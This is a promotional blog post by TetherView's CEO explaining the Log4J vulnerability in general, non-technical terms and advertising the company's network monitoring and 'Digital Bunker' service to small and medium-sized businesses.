Is Log4J Even Worse than You Think? Probably…

The Log4J Shell is being called the worst security vulnerability in a decade. When you dig into the details…it’s actually even worse than it sounds. 

By Michael Abboud, Chief Executive Officer, TetherView

Since its discovery in early December, Log4J has known no shortage of headlines. If cyber risk had an annual award ceremony, this thing would take home every trophy. Yet, despite all the headlines, few people outside of the cybersecurity arena seem to recognize the magnitude of the problem. Don’t get me wrong, people are spooked and taking action to patch their networks. What many don’t realize, however, is that the fallout from Log4J has the potential to stay with us for…years to come. To understand why, you first have to understand what Log4J actually is.

What is Log4J?

Log4J is an extremely popular logging library on the Java computing platform. In layman’s terms, “logging” refers to the communications between a computing system and the users of that system. In the simplest terms, it’s the act of “keeping a log.”

The vulnerability in the Log4J logging library targets areas that parse and log user-controlled data. To carry out an attack, hackers query services and attempt to trigger a log message like a 404 error. However, embedded in the hacker’s query is maliciously crafted code, which Log4j processes as instructions, bringing the malicious code directly (and unsuspectingly) into the network. Through this process, hackers can easily breach corporate networks and take over.

Now here’s the real kicker. I said earlier that Log4J was “widely used.” Exactly how widely used is Log4J? Estimates show that Log4J has been downloaded more than 400,000 times. Logging is a critical part of computing and because the Log4J  library is used by most web services in the world (Amazon, MS Azure, Cisco, VMware, Dell, Citrix etc.), it means most web services are vulnerable. In the days after the Log4J vulnerability, there were more than 3.7 million hacking attempts to exploit the vulnerability…that we know about.

While the bigger corporations used their resources to immediately spring to action and patch their network, the threat now is that hackers will start to target less-resourced small and medium sized businesses. Small and medium sized businesses are also the most likely to have their workforce working from personal devices, which can make a corporate network even more susceptible to the Log4J vulnerability. We can help.

This is Why TetherView Exists

Since the announcement of the breach, I’ve been asked by countless business leaders, “Mike, what could I have done to be better prepared?”

Run your network through our Digital Bunker. 

There really isn’t anything else for me to say. TetherView was built for exactly this purpose. We assume there will always be vulnerabilities for hackers to exploit…and we close your network so there is only one way in, and one way out. And when you partner with TetherView, someone is always keeping an eye on your network. We provide real time fully staffed monitoring. TetherView combines great technology with great people. When threats are identified we can quickly mitigate and monitor for any vulnerability. When something like Log4J happens, this means we can easily monitor all activity and focus directly on the area of vulnerability in your network.

SolarWinds. Log4J. Hackers are going to keep finding ways to come at your network. Let us help you keep them out.